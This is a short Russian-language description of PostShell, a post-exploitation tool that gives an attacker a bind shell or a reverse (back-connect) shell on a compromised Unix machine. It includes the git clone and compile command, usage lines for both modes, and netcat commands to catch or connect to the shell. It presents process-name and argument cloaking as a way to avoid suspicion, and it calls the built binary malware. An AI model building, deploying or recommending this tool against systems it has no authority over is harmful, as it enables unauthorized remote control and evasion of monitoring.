
PostShell - Постэксплуатационная оболочка привязки/обратного подключения
PostShell — это оболочка для пост-эксплуатации, которая включает как привязанную оболочку (bind shell), так и оболочку обратного подключения (back connect). Она создаёт полностью интерактивный TTY, что позволяет управлять задачами (job control). Размер заглушки (stub) — около 14 КБ, и она может быть скомпилирована на любой Unix-подобной системе.
Баннер и взаимодействие с оболочкой после установки соединения.
PostShell упрощает пост-эксплуатацию, делая атакующего менее зависимым от таких зависимостей, как Python и Perl. Он также включает как обратное подключение (back connect), так и привязанную оболочку (bind shell). Это означает, что если цель не разрешает исходящие соединения, оператор может просто запустить bind shell и подключиться к машине удалённо. PostShell также значительно менее подозрителен, чем традиционная оболочка, благодаря тому, что как имя процессов, так и аргументы скрыты (cloaked).
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
Это должно создать бинарный файл с именем «stub» — это вредоносная программа.$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Получение обратного подключения (backconnect):
$ nc -vlp port
Подключение к привязанной оболочке (bind shell):
$ nc host port